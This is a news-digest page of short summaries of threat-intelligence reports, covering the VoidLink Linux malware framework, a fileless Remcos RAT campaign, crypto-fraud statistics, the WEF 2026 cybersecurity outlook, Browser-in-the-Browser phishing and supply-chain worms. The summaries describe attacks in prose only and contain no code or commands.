All news in category “Threat and Trends Reports”

🛡️ Researchers at Check Point disclosed VoidLink, a sophisticated modular malware framework targeting Linux servers and containers in cloud environments. Written primarily in Zig with supporting components in Go, C, and JavaScript, the platform uses a two-stage loader and an extensible plugin ecosystem (37 built-in modules) delivered via a professional web-based C2 dashboard to harvest credentials and access source code systems. It detects major cloud providers and container runtimes, adapts evasion strategies based on detected EDR and kernel hardening, and employs rootkits and covert C2 channels to maintain stealthy, long-term access.

🛡️ FortiGuard Labs uncovered a phishing campaign that delivers a fileless Remcos RAT via a malicious Word document which loads a remote RTF exploiting CVE-2017-11882. The exploit executes shellcode to fetch a VBScript that launches a Base64 PowerShell loader. That PowerShell downloads an image with an embedded .NET module, which the loader runs in memory to install persistence and inject the Remcos payload into a legitimate process using process hollowing.

🔒 New 2026 analysis of 4,700 leading websites finds 64% of third-party applications access sensitive data without demonstrable business justification, rising from 51% in 2024. The report identifies recurring causes such as over-permissioned scripts, shadow deployments via tag managers, and persistent trackers. Specific tools flagged include Google Tag Manager, Shopify apps, and the Facebook Pixel, while government and education sites show marked increases in compromise. The study cautions that governance gaps and limited mitigation adoption leave organizations exposed.

🪙 Chainalysis reports cryptocurrency-related fraud reached at least $14bn in 2025 and expects the total to rise to $17bn as more illicit wallets are identified. Impersonation scams surged in volume by 1,400% YoY and payment values jumped, while AI-linked operations now extract substantially higher revenues. The report warns of industrialized, Asia-linked networks using layered laundering to convert crypto into real-world assets and urges combined prevention and law enforcement responses.

🔒 Cybercrime has evolved into a structured, global underground economy that mirrors legitimate corporations, with departments, KPIs, and scalable supply chains. Models like ransomware-as-a-service let nontechnical actors license malware, buy access, and outsource extortion, while payments and sales are managed via closed forums and cryptocurrencies. The result is an efficient, agile adversary that exploits human error, leverages AI for social engineering, and gains a persistent speed advantage over often bureaucratic defenders.

🔍 A newly identified cloud-native Linux malware framework named VoidLink targets modern cloud and container environments, providing custom loaders, implants, rootkits, and memory-loaded plugins. According to Check Point, it is written in Zig, Go, and C and adapts behavior based on Kubernetes, Docker, and cloud metadata queries. Communications can use HTTP, WebSocket, DNS tunneling, or ICMP encapsulated in a custom encrypted layer VoidStream, and the framework includes extensive anti-forensics and runtime protections. Analysts assess it appears under active development and may be a commercial or customer-targeted framework rather than evidence of a current widespread campaign.

🔍 The World Economic Forum’s Global Cybersecurity Outlook warns cybersecurity risk will accelerate in 2026, driven primarily by advances in AI, deepening geopolitical fragmentation and supply‑chain complexity. Based on survey responses from 804 leaders (including 316 CISOs) across 92 countries, the report finds eroding confidence in national preparedness and divergent priorities between CEOs and CISOs. It highlights both the risk and defensive potential of AI and calls for strengthening collective cyber resilience through collaboration, governance and balanced adoption with robust safeguards.

📈 In December 2025 organizations experienced an average of 2,027 cyber attacks per organization per week, reflecting a 1% month-over-month and 9% year-over-year increase. Latin America recorded the steepest rise, with 3,065 attacks per week on average, a 26% year-over-year jump. Check Point attributes sharper regional and sector-level spikes primarily to accelerating ransomware operations and growing exposure tied to enterprise adoption of generative AI. The findings signal heightened risk even as overall growth appears moderate.

🛡️ Check Point Research describes VoidLink, a cloud-native Linux malware framework built to maintain long-term, stealthy access to cloud infrastructure rather than targeting individual endpoints. Its modular, plug-in-driven design enables attackers to extend capabilities over time while remaining quiet. Adaptive stealth allows the framework to alter behavior based on defensive visibility, prioritizing evasion in monitored environments and speed where visibility is limited.

🛡️ Check Point Research disclosed a previously undocumented Linux malware framework named VoidLink, designed for long-term stealthy access to cloud and container environments. The cloud-native toolkit is highly modular, written in Zig, and comprises custom loaders, implants, rootkits, and an in-memory plugin system with more than 30 modules. It supports diverse C2 channels (HTTP/HTTPS, WebSocket, ICMP, DNS), peer-to-peer mesh networking, and automated cloud discovery across AWS, GCP, Azure, Alibaba, and Tencent. Check Point assesses the framework as actively maintained and attributes it to China-affiliated actors, warning of significant credential-theft and supply-chain risks for cloud-native ecosystems.

🔐 Attackers in 2025 are not inventing wholly new techniques but refining long‑standing ones—supply‑chain compromise, credential theft, and malware in official stores—at vastly greater scale. AI has lowered the barrier to entry, enabling small teams or individuals to publish trusted packages, automate phishing, and pivot them to malicious behavior. Gaps in permission models and slow supply‑chain mitigation let these campaigns cascade through dependencies. Defenders should prioritize fundamentals: fix permissions, harden verification, and make phishing‑resistant authentication the default.

🔒 Application security is shifting from relying solely on SAST, DAST, SCA and MAST to a posture-centric model that emphasizes posture, provenance and proof. The article recommends Application Security Posture Management (ASPM) as the control plane to correlate scanner outputs, enforce policy and prioritize actionable risks based on reachability and exposure. It urges stronger supply-chain controls—SLSA attestations, signed SBOMs and VEX—plus runtime protections such as IAST and RASP, and AI and language policies driven by recent NIST and NSA/CISA guidance.

🔒 If you learn your personal or financial data is on the dark web, act quickly: cybercriminals use stolen PII, credentials, session cookies and payment details to commit account takeover, identity theft and fraud. Immediately change compromised passwords, enable MFA (prefer authenticator apps or hardware keys), sign out of all devices, scan for infostealer malware and contact your bank to freeze or reissue cards. For longer-term protection, freeze credit, tighten privacy settings, use email aliasing and a password manager, and enroll in monitoring services such as HaveIBeenPwned.

🔐 Over the past six months, threat actors have increasingly used the Browser-in-the-Browser (BitB) technique to harvest Facebook credentials, according to Trellix. Attacks display realistic fake login pop-ups implemented with iframes and often leverage URL shorteners and reputable cloud hosts like Netlify and Vercel to evade detection. Campaigns impersonate law firms, copyright notices, and Meta security alerts, adding counterfeit CAPTCHA pages to increase legitimacy. To reduce risk, avoid embedded links, enable two-factor authentication, and verify whether login windows can be dragged outside the browser to detect BitB.

🐛 Shai‑Hulud marks a shift from passive supply‑chain tricks to an actively propagating worm that targets developer identities and CI/CD trust. Variants harvest NPM tokens, GitHub secrets and leverage stolen credentials to publish infected packages automatically, often including a dead‑man switch to erase traces. CISOs must treat pipelines and AI-assisted tooling as primary attack surfaces.

🔒Phishing and broader cyber-enabled fraud have overtaken ransomware as the primary concern for business leaders, according to the World Economic Forum’s Global Cybersecurity Outlook for 2026. The WEF report, produced with Accenture and released on 12 January ahead of Davos, found 77% of surveyed executives reported increases in fraud and phishing, with 62% aware of phishing incidents in their networks. The review also highlights accelerating AI-driven vulnerabilities — 87% reported rising AI-related risks and 94% expect AI to shape cybersecurity in 2026.

🔐 This week's recap highlights how small oversights and automation conveniences have become widespread attack vectors, enabling rapid, large-scale compromise. Key incidents include a maximum-severity RCE in n8n (Ni8mare, CVE-2026-21858) affecting self-hosted instances, the 2M-device Kimwolf Android botnet, and malicious Chrome extensions that exfiltrated AI conversations. The report catalogs numerous trending CVEs and active campaigns, emphasizing that familiar tools and exposed services are the biggest risks today.

📈 TRM Labs estimates illicit crypto wallets received $158bn in 2025, a 145% increase on 2024, while Chainalysis published a comparable $154bn figure. TRM attributes the surge to increased sanctions evasion (notably by Russia, Iran and Venezuela), improved identification via the Beacon Network, and a handful of large-scale hacks. The firm cautions that methodology changes and ongoing investigations mean these numbers are a dynamic baseline rather than fixed totals. Measured as a share of on-chain flows, illicit activity actually declined to 1.5% in 2025.

🔍 Cybersecurity researchers have identified service providers that supply tools, infrastructure, and turnkey platforms to scale pig butchering (PBaaS) operations across Southeast Asia. Vendors such as Penguin Account Store and UWORK offer stolen identities, pre-registered accounts, SIMs, CRM panels, mobile apps, and payment processors, enabling mass victimization and rapid fund movement. These offerings dramatically lower technical barriers and empower fraud operations tied to human-trafficking-enabled scam compounds.

🔐 In 2026 CISOs are balancing core security tasks with urgent AI-related challenges. Strengthening data protection, securing cloud and enterprise AI deployments, and improving identity and access management rank high. Leaders are preparing for AI-enabled attacks, rolling out AI to accelerate security operations, and addressing shadow AI and third-party risks to bolster resilience and supply-chain security.